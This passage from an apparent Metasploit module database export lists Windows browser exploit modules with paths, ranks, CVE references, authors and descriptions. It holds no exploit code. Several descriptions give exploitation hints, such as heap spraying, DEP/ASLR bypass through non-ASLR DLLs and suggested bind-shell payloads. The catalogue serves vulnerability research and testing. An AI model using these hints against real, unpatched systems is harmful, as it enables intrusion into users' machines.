Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or at an address that cannot be reached with the various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.","Metasploit Framework License (BSD)","f","2010-11-03 00:00:00",0,,"passive","t","BID-44536, CVE-2010-3962, EDB-15421, MSB-MS10-090, OSVDB-68987, URL-http://www.microsoft.com/technet/security/advisory/2458511.mspx","Matteo Memelli, Yuange, jduck , unknown" 482,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_003_ie_css_import.rb","exploit","windows/browser/ms11_003_ie_css_import","exploit/windows/browser/ms11_003_ie_css_import","Internet Explorer CSS Recursive Import Use After Free",400,"This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. The mscorie.dll module does not opt in to ASLR. 
As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.","Metasploit Framework License (BSD)","f","2010-11-29 00:00:00",0,,"passive","t","BID-45246, CVE-2010-3971, MSB-MS11-003, OSVDB-69796, URL-http://seclists.org/fulldisclosure/2010/Dec/110, URL-http://www.breakingpointsystems.com/community/blog/ie-vulnerability/, URL-http://www.microsoft.com/technet/security/advisory/2488013.mspx, URL-http://www.wooyun.org/bugs/wooyun-2010-0885, URL-http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf","d0c_s4vage, jduck , passerby" 483,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb","exploit","windows/browser/ms11_050_mshtml_cobjectelement","exploit/windows/browser/ms11_050_mshtml_cobjectelement","MS11-050 IE mshtml!CObjectElement Use After Free",300,"This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page continues to keep a reference to the freed object and attempts to call a function on it, leading to the use-after-free. 
Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).","Metasploit Framework License (BSD)","f","2011-06-16 00:00:00",0,,"passive","t","CVE-2011-1260, MSB-MS11-050, OSVDB-72950, URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html","bannedit , d0c_s4vage, sinn3r " 484,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_081_option.rb","exploit","windows/browser/ms11_081_option","exploit/windows/browser/ms11_081_option","Microsoft Internet Explorer Option Element Use-After-Free",300,"This module exploits a vulnerability in Microsoft Internet Explorer. A memory corruption may occur when the Option cache isn't updated properly, which allows other JavaScript methods to access a deleted Option element, and results in code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-10-11 00:00:00",0,,"passive","t","CVE-2011-1996, MSB-MS11-081, URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html, URL-http://pastebin.com/YLH725Aj","Ivan Fratric, juan vazquez , sinn3r " 485,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_093_ole32.rb","exploit","windows/browser/ms11_093_ole32","exploit/windows/browser/ms11_093_ole32","MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution",300,"This module exploits a type confusion vulnerability in the OLE32 component of Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple function. 
A Visio document with a specially crafted Summary Information Stream embedded allows remote code execution through Internet Explorer on systems with Visio Viewer installed.","Metasploit Framework License (BSD)","f","2011-12-13 00:00:00",0,,"passive","t","BID-50977, CVE-2011-3400, MSB-MS11-093, OSVDB-77663, URL-http://aluigi.org/adv/ole32_1-adv.txt, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966","Luigi Auriemma, juan vazquez " 486,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms12_004_midi.rb","exploit","windows/browser/ms12_004_midi","exploit/windows/browser/ms12_004_midi","MS12-004 midiOutPlayNextPolyEvent Heap Overflow",300,"This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to exceed what is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either ""inc al"" or ""dec al"" a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leads to remote code execution under the context of the user. Note: At this time, for the IE 8 target, msvcrt ROP is used by default. However, if you know your target's patch level, you may also try the 'MSHTML' advanced option for an info leak based attack. Currently, this module only supports two MSHTML builds: 8.0.6001.18702, which is often seen on a newly installed XP SP3, and 8.0.6001.19120, which is the patch level immediately before the MS12-004 fix. 
Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.","Metasploit Framework License (BSD)","f","2012-01-10 00:00:00",0,,"passive","t","BID-51292, CVE-2012-0003, MSB-MS12-004, OSVDB-78210, URL-http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php","Shane Garrett, juan vazquez , sinn3r " 487,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms12_037_ie_colspan.rb","exploit","windows/browser/ms12_037_ie_colspan","exploit/windows/browser/ms12_037_ie_colspan","Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",300,"This module exploits a heap overflow vulnerability in Internet Explorer caused by incorrect handling of the span attribute of col elements in a fixed table when they are modified dynamically by JavaScript code.","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"passive","t","BID-53848, CVE-2012-1876, MSB-MS12-037, OSVDB-82866, URL-http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php","Alexandre Pelletier, binjo, juan vazquez , mr_me , sinn3r " 488,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms12_037_same_id.rb","exploit","windows/browser/ms12_037_same_id","exploit/windows/browser/ms12_037_same_id","MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",300,"This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 on Windows XP SP3 and Windows 7. 
This module supports heap massaging as well as the heap spray method seen in the wild (Java msvcrt71.dll).","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"passive","t","CVE-2012-1875, MSB-MS12-037, OSVDB-82865, URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities, URL-https://twitter.com/binjo/status/212795802974830592","Dark Son, Google Inc., Qihoo 360 Security Center, Yichong Lin, juan vazquez " 489,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb","exploit","windows/browser/ms13_009_ie_slayoutrun_uaf","exploit/windows/browser/ms13_009_ie_slayoutrun_uaf","MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",300,"This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.","Metasploit Framework License (BSD)","f","2013-02-13 00:00:00",0,,"passive","t","CVE-2013-0025, MSB-MS13-009, URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf","Scott Bell " 490,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/msvidctl_mpeg2.rb","exploit","windows/browser/msvidctl_mpeg2","exploit/windows/browser/msvidctl_mpeg2","Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",300,"This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. 
ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid","Metasploit Framework License (BSD)","f","2009-07-05 00:00:00",0,,"passive","t","BID-35558, CVE-2008-0015, MSB-MS09-032, MSB-MS09-037, OSVDB-55651, URL-http://www.microsoft.com/technet/security/advisory/972890.mspx","Trancer " 491,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mswhale_checkforupdates.rb","exploit","windows/browser/mswhale_checkforupdates","exploit/windows/browser/mswhale_checkforupdates","Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the Microsoft Whale Intelligent Application Gateway Whale Client. When sending an overly long string to the CheckForUpdates() method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-04-15 00:00:00",0,,"passive","t","CVE-2007-2238, OSVDB-53933, URL-http://technet.microsoft.com/en-us/library/dd282918.aspx","MC " 492,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb","exploit","windows/browser/msxml_get_definition_code_exec","exploit/windows/browser/msxml_get_definition_code_exec","MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",400,"This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution.","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"passive","t","BID-53934, CVE-2012-1889, MSB-MS12-043, OSVDB-82873, URL-http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html, URL-http://technet.microsoft.com/en-us/security/advisory/2719615, URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462, 
URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities","binjo, inking26, juan vazquez , sinn3r " 493,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb","exploit","windows/browser/nctaudiofile2_setformatlikesample","exploit/windows/browser/nctaudiofile2_setformatlikesample","NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow",300,"This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX Control provided by various audio applications. By sending an overly long string to the ""SetFormatLikeSample()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-01-24 00:00:00",0,,"passive","t","BID-22196, CVE-2007-0018, OSVDB-32032, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062911.html, US-CERT-VU-292713","MC , dookie, jduck " 494,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/nis2004_antispam.rb","exploit","windows/browser/nis2004_antispam","exploit/windows/browser/nis2004_antispam","Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Norton AntiSpam 2004. 
When sending an overly long string to the LaunchCustomRuleWizard() method of symspam.dll (2004.1.0.147) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2004-03-19 00:00:00",0,,"passive","t","BID-9916, CVE-2004-0363, OSVDB-6249","MC " 495,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/nis2004_get.rb","exploit","windows/browser/nis2004_get","exploit/windows/browser/nis2004_get","Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004. By sending an overly long string to the ""Get()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-05-16 00:00:00",0,,"passive","t","CVE-2007-1689, OSVDB-36164, URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html","MC " 496,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/notes_handler_cmdinject.rb","exploit","windows/browser/notes_handler_cmdinject","exploit/windows/browser/notes_handler_cmdinject","IBM Lotus Notes Client URL Handler Command Injection",600,"This module exploits a command injection vulnerability in the URL handler for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with a specially crafted notes:// URL to execute arbitrary commands with arbitrary arguments. 
This module has been tested successfully on Windows XP SP3 with IE8, Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.","Metasploit Framework License (BSD)","f","2012-06-18 00:00:00",0,,"passive","t","BID-54070, CVE-2012-2174, OSVDB-83063, URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html, URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-154/","Moritz Jodeit, Sean de Regge, juan vazquez " 497,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb","exploit","windows/browser/novell_groupwise_gwcls1_actvx","exploit/windows/browser/novell_groupwise_gwcls1_actvx","Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",300,"This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll ActiveX. Several methods in the GWCalServer control use user provided data as a pointer, which allows reading arbitrary memory and executing arbitrary code. This module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. JRE 6 needs to be installed to achieve the ASLR bypass.","Metasploit Framework License (BSD)","f","2013-01-30 00:00:00",0,,"passive","t","BID-57658, CVE-2012-0439, OSVDB-89700, URL-http://www.novell.com/support/kb/doc.php?id=7011688, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-008","juan vazquez , rgod " 498,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_callbackurl.rb","exploit","windows/browser/novelliprint_callbackurl","exploit/windows/browser/novelliprint_callbackurl","Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. 
When sending an overly long string to the 'call-back-url' parameter in an op-client-interface-version action of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-08-20 00:00:00",0,,"passive","t","CVE-2010-1527, EDB-15042, OSVDB-67411, URL-http://secunia.com/secunia_research/2010-104/","Trancer " 499,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_datetime.rb","exploit","windows/browser/novelliprint_datetime","exploit/windows/browser/novelliprint_datetime","Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",500,"This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing a specially crafted date/time string via certain parameters to ienipp.ocx an attacker can execute arbitrary code. NOTE: The ""operation"" variable must be set to a valid command in order to reach this vulnerability.","Metasploit Framework License (BSD)","f","2009-12-08 00:00:00",0,,"passive","t","BID-37242, CVE-2009-1569, OSVDB-60804, URL-http://secunia.com/advisories/35004/","jduck " 500,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_executerequest.rb","exploit","windows/browser/novelliprint_executerequest","exploit/windows/browser/novelliprint_executerequest","Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell iPrint Client 4.26. 
When sending an overly long string to the ExecuteRequest() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-22 00:00:00",0,,"passive","t","BID-27939, CVE-2008-0935, OSVDB-42063","MC " 501,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb","exploit","windows/browser/novelliprint_executerequest_dbg","exploit/windows/browser/novelliprint_executerequest_dbg","Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40. When sending an overly long string to the 'debug' parameter in ExecuteRequest() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-08-04 00:00:00",0,,"passive","t","CVE-2010-3106, EDB-15001, OSVDB-66960, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06","Trancer " 502,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_getdriversettings.rb","exploit","windows/browser/novelliprint_getdriversettings","exploit/windows/browser/novelliprint_getdriversettings","Novell iPrint Client ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell iPrint Client 4.34. 
When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-06-16 00:00:00",0,,"passive","t","CVE-2008-2908, OSVDB-46194, URL-http://secunia.com/advisories/30709/","MC " 503,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb","exploit","windows/browser/novelliprint_getdriversettings_2","exploit/windows/browser/novelliprint_getdriversettings_2","Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-11-15 00:00:00",0,,"passive","t","BID-44966, CVE-2010-4321, EDB-16014, OSVDB-69357, URL-http://www.novell.com/support/viewContent.do?externalId=7007234, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-256/","Dr_IDE, mr_me " 504,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_target_frame.rb","exploit","windows/browser/novelliprint_target_frame","exploit/windows/browser/novelliprint_target_frame","Novell iPrint Client ActiveX Control target-frame Buffer Overflow",500,"This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing an overly long string via the ""target-frame"" parameter to ienipp.ocx an attacker can execute arbitrary code. 
NOTE: The ""operation"" variable must be set to a valid command in order to reach this vulnerability.","Metasploit Framework License (BSD)","f","2009-12-08 00:00:00",0,,"passive","t","BID-37242, CVE-2009-1568, OSVDB-60803, URL-http://secunia.com/advisories/37169/","jduck " 505,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ntr_activex_check_bof.rb","exploit","windows/browser/ntr_activex_check_bof","exploit/windows/browser/ntr_activex_check_bof","NTR ActiveX Control Check() Method Buffer Overflow",300,"This module exploits a vulnerability found in NTR ActiveX 1.1.8. The vulnerability exists in the Check() method, due to the insecure usage of strcat to build a URL using the bstrParams parameter contents (note: this is also the reason why the module won't allow you to modify the URIPATH), which leads to code execution under the context of the user visiting a malicious web page. In order to bypass DEP and ASLR on Windows Vista and Windows 7, JRE 6 is needed.","Metasploit Framework License (BSD)","f","2012-01-11 00:00:00",0,,"passive","t","BID-51374, CVE-2012-0266, OSVDB-78252, URL-http://secunia.com/secunia_research/2012-1/","Carsten Eiram, juan vazquez " 506,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ntr_activex_stopmodule.rb","exploit","windows/browser/ntr_activex_stopmodule","exploit/windows/browser/ntr_activex_stopmodule","NTR ActiveX Control StopModule() Remote Code Execution",300,"This module exploits a vulnerability found in the NTR ActiveX 1.1.8. 
The vulnerability exists in the StopModule() method, where the lModule parameter is used to dereference memory to get a function pointer, which leads to code execution under the context of the user visiting a malicious web page.","Metasploit Framework License (BSD)","f","2012-01-11 00:00:00",0,,"passive","t","BID-51374, CVE-2012-0267, OSVDB-78253, URL-http://secunia.com/secunia_research/2012-2/","Carsten Eiram, juan vazquez " 507,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb","exploit","windows/browser/oracle_autovue_setmarkupmode","exploit/windows/browser/oracle_autovue_setmarkupmode","Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",300,"This module exploits a vulnerability found in the AutoVue.ocx ActiveX control. The vulnerability, due to the insecure usage of a strcpy-like function in the SetMarkupMode method when handling a specially crafted sMarkup argument, allows triggering a stack-based buffer overflow which leads to code execution under the context of the user visiting a malicious web page. 
The module has been successfully tested against Oracle AutoVue Desktop Version 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed for the DEP and ASLR bypass).","Metasploit Framework License (BSD)","f","2012-04-18 00:00:00",0,,"passive","t","BID-53077, CVE-2012-0549, OSVDB-81439, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05, URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html, URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549","Brian Gorenc, juan vazquez " 508,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb","exploit","windows/browser/oracle_dc_submittoexpress","exploit/windows/browser/oracle_dc_submittoexpress","Oracle Document Capture 10g ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control emsmtp.dll (6.0.1.0). When passing an overly long string to the method ""SubmitToExpress"" an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-28 00:00:00",0,,"passive","t","BID-25467, CVE-2007-4607, OSVDB-38335, US-CERT-VU-281977","MC " 509,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/orbit_connecting.rb","exploit","windows/browser/orbit_connecting","exploit/windows/browser/orbit_connecting","Orbit Downloader Connecting Log Creation Buffer Overflow",300,"This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an attacker serves up a malicious web site, arbitrary code may be executed. 
The PAYLOAD windows/shell_bind_tcp works best.","Metasploit Framework License (BSD)","f","2009-02-03 00:00:00",0,,"passive","t","BID-33894, CVE-2009-0187, OSVDB-52294","MC " 510,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ovftool_format_string.rb","exploit","windows/browser/ovftool_format_string","exploit/windows/browser/ovftool_format_string","VMWare OVF Tools Format String Vulnerability",300,"This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-08 00:00:00",0,,"passive","t","BID-56468, CVE-2012-3569, OSVDB-87117, URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html","Jeremy Brown, juan vazquez " 511,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/pcvue_func.rb","exploit","windows/browser/pcvue_func","exploit/windows/browser/pcvue_func","PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",200,"This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0. 
By setting a dword value for the SaveObject() or LoadObject(), an attacker can overwrite a function pointer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-10-05 00:00:00",0,,"passive","t","BID-49795, CVE-2008-4915, URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt","Luigi Auriemma, TecR0c , mr_me " 512,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/persits_xupload_traversal.rb","exploit","windows/browser/persits_xupload_traversal","exploit/windows/browser/persits_xupload_traversal","Persits XUpload ActiveX MakeHttpRequest Directory Traversal",600,"This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control (version 3.0.0.3) that's included in HP LoadRunner 9.5. By passing a string containing ""..\"" sequences to the MakeHttpRequest method, an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory. You may want to combine this module with the use of multi/handler since a user would have to log in for the payload to execute.","Metasploit Framework License (BSD)","f","2009-09-29 00:00:00",0,,"passive","t","CVE-2009-3693, OSVDB-60001, URL-http://retrogod.altervista.org/9sg_hp_loadrunner.html","jduck " 513,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/quickr_qp2_bof.rb","exploit","windows/browser/quickr_qp2_bof","exploit/windows/browser/quickr_qp2_bof","IBM Lotus QuickR qp2 ActiveX Buffer Overflow",300,"This module exploits a buffer overflow vulnerability in the UploadControl ActiveX. The vulnerability exists in the handling of the ""Attachment_Times"" property, due to the insecure usage of _swscanf. The affected ActiveX is provided by the qp2.dll installed with the IBM Lotus Quickr product. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using qp2.dll 8.1.0.1800. 
To bypass ASLR, the non-ASLR-compatible module msvcr71.dll is used; it is installed with the qp2 ActiveX.","Metasploit Framework License (BSD)","f","2012-05-23 00:00:00",0,,"passive","t","BID-53678, CVE-2012-2176, OSVDB-82166, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-134/","Gaurav Baruah, juan vazquez " 514,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/real_arcade_installerdlg.rb","exploit","windows/browser/real_arcade_installerdlg","exploit/windows/browser/real_arcade_installerdlg","Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",300,"This module exploits a vulnerability in Real Networks Arcade Games' ActiveX control. The ""exec"" function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands on the victim machine.","Metasploit Framework License (BSD)","f","2011-04-03 00:00:00",0,,"passive","t","EDB-17105, OSVDB-71559","rgod, sinn3r " 515,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_cdda_uri.rb","exploit","windows/browser/realplayer_cdda_uri","exploit/windows/browser/realplayer_cdda_uri","RealNetworks RealPlayer CDDA URI Initialization Vulnerability",300,"This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object initialization failure. 
However, this failure is improperly handled and uninitialized memory is executed.","Metasploit Framework License (BSD)","f","2010-11-15 00:00:00",0,,"passive","t","BID-44144, CVE-2010-3747, OSVDB-68673, URL-http://service.real.com/realplayer/security/10152010_player/en/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-210/","bannedit , sinn3r " 516,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_console.rb","exploit","windows/browser/realplayer_console","exploit/windows/browser/realplayer_console","RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",300,"This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-03-08 00:00:00",0,,"passive","t","BID-28157, CVE-2008-1309, OSVDB-42946, URL-http://secunia.com/advisories/29315/","Elazar Broad " 517,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_import.rb","exploit","windows/browser/realplayer_import","exploit/windows/browser/realplayer_import","RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",300,"This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and RealPlayer 10.5 Build 6.0.12.1483. 
By sending an overly long string to the ""Import()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-18 00:00:00",0,,"passive","t","BID-26130, CVE-2007-5601, OSVDB-41430","MC " 518,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_qcp.rb","exploit","windows/browser/realplayer_qcp","exploit/windows/browser/realplayer_qcp","RealNetworks Realplayer QCP Parsing Heap Overflow",200,"This module exploits a heap overflow in Realplayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted ""fmt"" chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.","Metasploit Framework License (BSD)","f","2011-08-16 00:00:00",0,,"passive","t","BID-49172, CVE-2011-2950, OSVDB-74549, URL-http://lists.helixcommunity.org/pipermail/datatype-cvs/2011-April/015469.html, URL-http://service.real.com/realplayer/security/08162011_player/en/, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-265/","Sean de Regge, juan vazquez " 519,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_smil.rb","exploit","windows/browser/realplayer_smil","exploit/windows/browser/realplayer_smil","RealNetworks RealPlayer SMIL Buffer Overflow",300,"This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8. By creating a URL link to a malicious SMIL file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.smil'. 
